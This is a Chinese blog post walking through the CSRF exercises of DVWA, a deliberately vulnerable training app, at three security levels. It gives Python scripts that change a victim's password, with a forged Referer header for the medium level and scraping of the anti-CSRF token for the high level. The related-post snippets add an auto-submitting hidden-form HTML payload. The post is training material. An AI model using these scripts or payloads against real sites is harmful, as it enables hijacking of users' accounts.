DVWA - CSRF (low, medium, high)

最新推荐文章于 2024-10-31 13:28:40 发布
原创 最新推荐文章于 2024-10-31 13:28:40 发布 · 3.7k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#security

本文通过实例演示了如何针对不同安全级别的CSRF漏洞进行攻击,包括设置PHPSESSID和security参数进行基本攻击、通过Referer验证提高攻击难度及动态获取user_token实现高级攻击。
该文章已生成可运行项目,

low

设置一下cookie的PHPSESSID和security即可跨站请求

import requests

def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

medium

查看源码,发现

// Checks to see where the request came from 
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。

import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

high

查看源码,发现多了动态user_token验证

// Check Anti-CSRF token 
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。

import requests
import re


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'       
    }
    res = requests.get(url, headers=headers)
    m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
    if m:
        user_token = m.group(1)
        new_password = 'ac'
        url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
        res = requests.get(url, headers=headers)
        if 'Password Changed.' in res.content:
            print('Yes')
        else:
            print('No')
            print(res.content)


if __name__ == '__main__':
    main()

注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。

本文章已经生成可运行项目
DVWA-CSRF
STTTM的博客
12-18 1189
LOW等级: 首先进行正常操作。 接下来打开burpsuit抓包 如图所示,将password参数test改为password: 退出DVWA用刚刚修改的密码成功登陆: 由此可知,这个数据包发送给其他用户,只要该用户登陆了DVWA的网站,就能修改他们的密码,攻击者只要修改password_new和password_conf这两个参数为自己想要的密码,将新的get请求的...
dvwacsrf
qq_17762247的博客
05-15 482
一、简介 CSRF是指在受害人不知情的情况下,以其身份向服务器发送服务器发送请求,从而执行非法操作(转账,改密等)。以转账为例,受害人A使用浏览器登录某银行网站B完成查看余额操作后,在未退出的情况下访问了攻击网站C,C利用浏览器中的Session伪造转账请求发送给B,由于B发现该转账请求包含用户登录信息,转账成功。Cross-site是指受害者在访问网站C时给网站B发送了请求,request forgery是指该请求是网站C伪造的,并不是A的本意。 二、Low 1、服务器端代码 <?php if(
DVWA CSRFmedium级别
qq_59119347的博客
10-31 240
上述代码的意思是说去Referer字段里面查找是否存在ServerName(即主机IP或域名)字段的值,如果存在则满足条件。为了构造一个有效的Referer,可以创建一个新的HTML页面,命名为:网站的IP.html。当我们点击1这个链接时网站就会跳转到这么修改密码的界面,并把密码修改完成。referer字段就包含了这网站的地址就实现的绕过。并在本地创建一个名字为自己IP的html界面。我们在这么html里面写入攻击脚本。我们在kali里面启一个临时网站。我们点击这么html链接。
DVWACSRF
GVFDBDF的专栏
09-05 1178
1、源码审计(low级别)                      if (isset($_GET['Change'])) {              // Turn requests into variables         $pass_new = $_GET['password_new'];         $pass_conf = $_GET['passwor
DVWACSRF
RexHa的博客
09-30 9074
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA-csrf
告白的博客
07-28 645
0x00 漏洞介绍 CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。 用户登录、浏览并信任正规网站WebA,同时,WebA通过用户的验证并在用户的浏览器中产生Cookie。 简单理解:将即将支付网址连接盗取,将伪造站点操作代码放在csrf伪造站点,当点击伪造站点自动
DVWA-CSRF(跨站请求伪造)
qq_45751902的博客
04-25 3161
目录CSRF(跨站请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible CSRF(跨站请求伪造)简介 概念 CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 CSRF与XSS的区别 CSRF属于业务逻辑漏洞
DVWACSRF-Medium跨站请求伪造中级
qq_39330735的博客
02-09 1002
DVWACSRF-Medium跨站请求伪造中级,过关思路和详解
DVWA-CSRF跨站请求伪造 MediumLow级别
xmj818719的博客
02-27 422
1代码分析 过滤条件 if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false ) 判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址 $_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9 $_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.1.
DVWA-CSRF全级别教程
weixin_44716769的博客
09-08 3964
CSRF Low等级 查看源码 服务器收到修改密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修改密码,并没有任何的防CSRF机制(当然服务器对请求的发送者是做了身份验证的,是检查的cookie,只是这里的代码没有体现)。 构造链接 http://192.168.0.103/vulnerabilities/csrf/?password_new=zuowenyang&password_conf=zuowenyang&Change=Chang
DVWA-CSRF漏洞
sc_Pease的博客
01-29 567
参考:https://blog.youkuaiyun.com/qq_44720671/article/details/97393100 一、漏洞简介 1,CSRF:cross-site request forgery跨站请求伪造,一种常见Web攻击。 2,利用场景:攻击者伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击就完成了。 3,与XSS比较:csrf是借助用户的权限去完成,而xss是盗取用户权限去进行破坏。 二、查看不同难度的dvwa源代码 1,low难度 查看网页源代码
dvwa csrf
一个安全研究员
05-17 790
科普 csrf就是江湖中的借刀杀人,这里的刀就是用户的cookie,例如:当一个用户登陆了某个系统时,该用户就持有了这个系统分发给他的会话,然后csrf这个漏洞就是我们可以利用这个会话来伪造请求。具体的利用方法,我将通过dvwa中的实例来讲解。 low 虽然我们的dvwa中比起真实的环境差了太多,但是我们可以假设我们现在处于一个真实的环境中,我们打开csrf页面,可以看到是一个改密的页面: ...
dvwa-csrf
Alter__的博客
04-23 513
(元素可提供有关页面的元信息,比如针对搜索引擎和更新频度的描述和关键词) (关联css文件) (role充当什么角色nav?)
dvwaCSRF
Alsn86的博客
02-05 473
dvwaCSRF 是一个修改密码的功能 把密码修改为111111的请求数据包是这样的,请求链接为http://192.168.1.110/dvwa-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change CSRFlow等级 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_G
DVWA CSRF
m0_73606240的博客
01-13 320
DVWA CSRF
Dvwa系列之csrf
lowerxiaoshen的博客
12-09 1534
CSRF(Cross-site request forgery)CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)CSRF与XSS最大的
DVWA——CSRF
weixin_51559599的博客
11-13 2460
这样解决了上种方法在请求中加入 token 的不便,同时,通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏,也不用担心 token 会透过 Referer 泄露到其他网站中去。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。可以利用这一点漏洞,可以想办法在恶意网站的地址中添加带有 Web1 主机地址的字段。
dvwa csrf漏洞攻击实例
最新发布
12-27
### DVWA CSRF 漏洞攻击实例 #### 准备工作 为了成功实施跨站请求伪造(CSRF)攻击,在DVWA环境中,需先设置好测试环境并调整安全级别至低以便于理解整个过程[^1]。 #### 攻击流程展示 假设存在一个用户修改密码的功能页面`change-password.php`。此功能未正确校验发起更改请求的源头是否合法,从而可能遭受CSRF攻击影响。 ##### 正常操作场景 当一名已认证用户访问该页面时会看到表单用于输入新旧密码组合提交给服务器处理: ```html <form action="password-change.php" method="POST"> Current password:<br> <input type="text" name="current_password"><br> New password:<br> <input type="text" name="new_password"><br> Confirm new password:<br> <input type="text" name="confirm_new_password"><br><br> <input type="submit" value="Change Password"> </form> ``` ##### 构造恶意链接或网页片段 攻击者创建含有隐藏表单自动提交逻辑的HTML代码,诱导受害者点击特定URL或者浏览嵌入了这段代码的网页: ```html <html> <body onload='document.getElementById("f").submit()'> <form id="f" action="http://target-site.com/password-change.php" method="POST"> <input type="hidden" name="current_password" value="any_value"/> <input type="hidden" name="new_password" value="attacker_chosen"/> <input type="hidden" name="confirm_new_password" value="attacker_chosen"/> </form> </body> </html> ``` 一旦受害者的浏览器加载上述内容,则会在不知情的情况下发送一条改变其账户密码的有效HTTP POST 请求到目标Web应用,即使这个动作并非由他们自己主动触发完成。 #### 防护措施建议 引入一次性令牌(Token),即在每次生成涉及敏感数据变更的操作界面时附加独一无二且难以预测的随机字符串作为额外参数传递,并服务端严格检验收到的数据里携带的token值与预期相符才能继续后续业务逻辑处理步骤[^2]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值